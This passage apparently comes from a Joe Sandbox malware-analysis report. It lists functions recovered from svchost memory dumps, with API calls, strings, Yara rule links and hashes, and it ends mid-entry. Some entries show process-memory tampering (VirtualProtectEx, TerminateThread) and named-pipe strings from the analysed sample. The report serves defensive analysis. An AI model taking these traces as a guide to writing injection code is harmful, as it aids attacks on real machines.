Instruction Fuzzy Hash: F3211A36618B6083EB119B65F54439A67B0F789BA8F504216EA9D07FA8DF7CC15DCB00

Function 00000179537A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000179537A10AB
RegEnumValueW.ADVAPI32 ref: 00000179537A110E
GetProcessHeap.KERNEL32 ref: 00000179537A1155
HeapAlloc.KERNEL32 ref: 00000179537A1163
GetProcessHeap.KERNEL32 ref: 00000179537A1187
HeapFree.KERNEL32 ref: 00000179537A1195

Strings

d, xrefs: 00000179537A10CE

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: d3e5ddb8c7ea47e145821f6ccb884b43ef8b81797d3f302e12167a070b06dd6f
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 56419133618B9097E761CF52E4443DAB7B1F389B88F408126EB8907B54EF38D1A8CB00

Function 0000017953D4104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017953D410AB
RegEnumValueW.ADVAPI32 ref: 0000017953D4110E
GetProcessHeap.KERNEL32 ref: 0000017953D41155
HeapAlloc.KERNEL32 ref: 0000017953D41163
GetProcessHeap.KERNEL32 ref: 0000017953D41187
HeapFree.KERNEL32 ref: 0000017953D41195

Strings

d, xrefs: 0000017953D410CE

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 43356fa826101fb385b1a2c84415f541f4fce1ea23c048e743393c20f25d9e34
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 62416D73618B9097E7658F62E4447DAB7B1F389B88F00812ADB8907B58DF78D56DCB00

Function 00000179537A75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000179537A7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000179537A766A
_RTC_Initialize.LIBCMT ref: 00000179537A7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000179537A76BE
__scrt_release_startup_lock.LIBCMT ref: 00000179537A76E9

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: fe0b3c69a772beff74a310c280af15da20169bff3b51c378fc6cd5bad66cdd7b
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: F181A231F2C2E186F6579BE998513E963F2AB4778CF0840A7990DC7796EA38C94D8710

Function 00000179537769F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017953776A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000017953776A6A
_RTC_Initialize.LIBCMT ref: 0000017953776A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017953776ABE
__scrt_release_startup_lock.LIBCMT ref: 0000017953776AE9

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 60b4277ef502123304cdda403c19c92aaea76ebe1c7de292c57dba5dee19c896
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0081D431F1C2A186FA57AB2698413D9A7F0EB8778CF544527DA0D8779ADB38C84E8704

Function 0000017953D475F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017953D47618
__scrt_acquire_startup_lock.LIBCMT ref: 0000017953D4766A
_RTC_Initialize.LIBCMT ref: 0000017953D47698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017953D476BE
__scrt_release_startup_lock.LIBCMT ref: 0000017953D476E9

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 662996d2083bf6fd62e3e0765b4ba47f2ed88007cb6559608672a045c510e3df
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1B81A231B0C36186FBD39B69A8413D923F1B79578CF584427AA2DC7B96DBB8C84D8710

Function 00000179537A9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000179537A9889
GetLastError.KERNEL32 ref: 00000179537A9897
LoadLibraryExW.KERNEL32 ref: 00000179537A98C1
FreeLibrary.KERNEL32 ref: 00000179537A9907
GetProcAddress.KERNEL32 ref: 00000179537A9913

Strings

api-ms-, xrefs: 00000179537A98A9

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: fb00aff284e09e6af16075ed21140bb303b4032a6c08bac2c3ba20d5d6053718
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: B731A531A2AB68A1FE179B06A8107DD63B4FB4BBA8F190526DD6D47384EF38C45D8300

Function 0000017953D49804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000017953D49889
GetLastError.KERNEL32 ref: 0000017953D49897
LoadLibraryExW.KERNEL32 ref: 0000017953D498C1
FreeLibrary.KERNEL32 ref: 0000017953D49907
GetProcAddress.KERNEL32 ref: 0000017953D49913

Strings

api-ms-, xrefs: 0000017953D498A9

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: b1a9df5a77c28b3842d60e42d2a6d64dad16561cf8296d9081ebfd5272c7df59
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: EF31A13221ABA091EF179B17A8007D963F4BB08BA8F194526ED6D4B780EF78C44D8300

Function 00000179537B1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000179537B1BCD
GetLastError.KERNEL32 ref: 00000179537B1BD9
CloseHandle.KERNEL32 ref: 00000179537B1BF1
CreateFileW.KERNEL32 ref: 00000179537B1C1C
WriteConsoleW.KERNEL32 ref: 00000179537B1C3B

Strings

CONOUT$, xrefs: 00000179537B1BFD

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 4dd854cc27738fee971dc4d248d953faf7b5b467519e62f606b3a150afd8830f
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 3D11BF31B18B6486F7528B42E86439973B4F78AFE8F000226EA5D87794EF3CC9488740

Function 0000017953D51B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000017953D51BCD
GetLastError.KERNEL32 ref: 0000017953D51BD9
CloseHandle.KERNEL32 ref: 0000017953D51BF1
CreateFileW.KERNEL32 ref: 0000017953D51C1C
WriteConsoleW.KERNEL32 ref: 0000017953D51C3B

Strings

CONOUT$, xrefs: 0000017953D51BFD

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: c547da781cfa8c5f9133cafa5bf72de5d446ee9970be24b3e481ebb3e5fd2a63
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: FD119D32318B6086E7529B56F854799B3F0F398FE8F000226EE5D87B94DF78C9588740

Function 00000179537A5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000179537A5C4B
GetThreadContext.KERNEL32 ref: 00000179537A5DB5

Part of subcall function 00000179537A5A40: GetCurrentThreadId.KERNEL32 ref: 00000179537A5A44

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: de58720446573f38df410790958115264cac2ca19ba3ca045ca26aac2ae5ccaf
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 14D1997661DB98C2DA719B1AE49439AB7B0F389B98F100216EACD47BA5DF3CC545CB00

Function 0000017953D45C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017953D45C4B
GetThreadContext.KERNEL32 ref: 0000017953D45DB5

Part of subcall function 0000017953D45A40: GetCurrentThreadId.KERNEL32 ref: 0000017953D45A44

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 5c3593c5b5a5305e3b7e09e44a91fb22c5de2862b488beb9c3ad4838d7f49401
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: B1D1B976208B9882DB71DB1AE49439A77B1F7C8B88F100116EACD47BA5DFBCC555CB00

Function 00000179537A30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000179537A30D7
HeapAlloc.KERNEL32 ref: 00000179537A30EA
StrCmpNIW.SHLWAPI ref: 00000179537A316B
GetProcessHeap.KERNEL32 ref: 00000179537A31D1
HeapFree.KERNEL32 ref: 00000179537A31DF

Strings

dialer, xrefs: 00000179537A3164

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: bb244d26d202178e2e698a051b50a56d7156bf69fd7b977937b4bd25da37fbb8
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: B4319331B19F6592FB56DF96E8446E963B0FB46B88F0440269E4C07F54FF38D4A98700

Function 0000017953D430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017953D430D7
HeapAlloc.KERNEL32 ref: 0000017953D430EA
StrCmpNIW.SHLWAPI ref: 0000017953D4316B
GetProcessHeap.KERNEL32 ref: 0000017953D431D1
HeapFree.KERNEL32 ref: 0000017953D431DF

Strings

dialer, xrefs: 0000017953D43164

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: bc490cab6f10554e7cc4f6725225c48185fb81c17ba62f82f24fd0007ef811e1
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 65318131709B7592EB56DF9AA8447E963B0FB54B88F0881229E4D07B54EF78C4BDC700

Function 00000179537A1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000179537A1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000179537A1A58
PathFindFileNameW.SHLWAPI ref: 00000179537A1A67
lstrlenW.KERNEL32 ref: 00000179537A1A73
StrCpyW.SHLWAPI ref: 00000179537A1A86
CloseHandle.KERNEL32 ref: 00000179537A1A94

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 6c9f91e3a03382234b65fbc9f7c05ce95aea04b3e0e994b99970f10821bfc3a6
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: A2016D31B08A5596FB11DB52A8A839963B5F789FC8F884036DE8D43754EF3CC9C98700

Function 0000017953D41A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000017953D41A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000017953D41A58
PathFindFileNameW.SHLWAPI ref: 0000017953D41A67
lstrlenW.KERNEL32 ref: 0000017953D41A73
StrCpyW.SHLWAPI ref: 0000017953D41A86
CloseHandle.KERNEL32 ref: 0000017953D41A94

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 62a0d3b532f12bedb06b8585014677500c4d1457d2df2cc89a8cafbcac868ed1
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 03011731708B5196EB16DB62B85879963B1F788FC8F488436DE8D43B54DF78C98E8740

Function 00000179537A37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000179537A37C8
GetCurrentProcess.KERNEL32 ref: 00000179537A37D6
VirtualProtectEx.KERNEL32 ref: 00000179537A37F8
GetCurrentProcess.KERNEL32 ref: 00000179537A3819
VirtualProtectEx.KERNEL32 ref: 00000179537A383A
TerminateThread.KERNEL32 ref: 00000179537A3849

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 328bcb0f3b657e4e7b0b0eb2427655a71625d9a7eea54b0913c3979adf7372be
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: EC116D74A19B6486FB229B61F82979663B4FB4AB89F040426CD4D07B54FF3CC04CC710

Function 0000017953D437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000017953D437C8
GetCurrentProcess.KERNEL32 ref: 0000017953D437D6
VirtualProtectEx.KERNEL32 ref: 0000017953D437F8
GetCurrentProcess.KERNEL32 ref: 0000017953D43819
VirtualProtectEx.KERNEL32 ref: 0000017953D4383A
TerminateThread.KERNEL32 ref: 0000017953D43849

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 98e0fb8ffe8b08277a3141cfd9b2ab10b17c21a80a57894efa2c2e7251c3fd23
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: FE112D7561976082FB269F65F409796A7F0BB58B89F040426DD4D47B54EF3CC41CC700

Function 0000017953D490D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017953D49103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017953D49198
RtlUnwindEx.NTDLL ref: 0000017953D491E7

Strings

f, xrefs: 0000017953D49116
csm, xrefs: 0000017953D4917E

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: f82fcae40f8ce00a7f6b31fa9e414c03d589631d3bbd82575b9de048900d0754
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 5651D3323196209BEB56CF26E484B9937B5F344B8CF948122EE5E47748DBB5CD49C700

Function 00000179537A90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000179537A9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000179537A9198
RtlUnwindEx.NTDLL ref: 00000179537A91E7

Strings

f, xrefs: 00000179537A9116
csm, xrefs: 00000179537A917E

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 9468f93ce32db143040ae69ef994ffd20732e21772612c9d05215ff005760186
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: A251A132B296288AEB96CB15E444BDD33B5F347B9CF508122DA0E47B88EB35DC59C700

Function 00000179537A90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000179537A9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000179537A9198
RtlUnwindEx.NTDLL ref: 00000179537A91E7

Strings

f, xrefs: 00000179537A9116
csm, xrefs: 00000179537A917E

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: a9a055084eb90fbab25c282e8fff424a4fc1c979f75e7898b94f3ca87daab5c5
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: C931E032A2966496E712DF21E848B9D37B5F747B8CF048116EE4E03B84EB38C958C704

Function 00000179537A1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000179537A1AD8
StrCmpNIW.SHLWAPI ref: 00000179537A1AF2
lstrlenW.KERNEL32 ref: 00000179537A1B01
StrCpyW.SHLWAPI ref: 00000179537A1B16

Strings

\\?\, xrefs: 00000179537A1AE6

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 8ef73a6d17c5181fc26fe53d14bc71b85ee070806e4b74a87cb371eb949d1953
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 0CF0447271869592F7619B65F4E43D96771F745B8CF848022CA8D47664EF3CC68CCB00

Function 0000017953D41AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000017953D41AD8
StrCmpNIW.SHLWAPI ref: 0000017953D41AF2
lstrlenW.KERNEL32 ref: 0000017953D41B01
StrCpyW.SHLWAPI ref: 0000017953D41B16

Strings

\\?\, xrefs: 0000017953D41AE6

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: e0bfd5b1c7735f84651dc4fa5ed51da96056f857026c4493821910d27f5a1d96
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: E2F04F7230866192EB228BA5F49939A67B0F754B8CF848022CA8D47A54DF6CC68CCB00

Function 00000179537A3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000179537A3222
StrCpyW.SHLWAPI ref: 00000179537A3232
StrCatW.SHLWAPI ref: 00000179537A323E
PathCombineW.SHLWAPI ref: 00000179537A324C

Strings

\\.\pipe\, xrefs: 00000179537A3218

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: c83c9d28c704160dc0fe5e41b9c2bf0097c43b62eeb3fda8efb59c4134b346ee
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: E7F08930B18BA091FA054B93B9541955330E749FD4F088132DD9E07B58DE2CC4898300

Function 0000017953D43200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000017953D43222
StrCpyW.SHLWAPI ref: 0000017953D43232
StrCatW.SHLWAPI ref: 0000017953D4323E
PathCombineW.SHLWAPI ref: 0000017953D4324C

Strings

\\.\pipe\, xrefs: 0000017953D43218

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: d7e82976dfde1dc4d4d4de19e26bad0ed23d16972c276b0e218568bba0d9a431
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 1AF0AE3030CBA091FB028B97B94529563B0F748FD8F084132DD5E07F18CE2CC5598300

Function 00000179537AA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000179537AA154
GetProcAddress.KERNEL32 ref: 00000179537AA16A
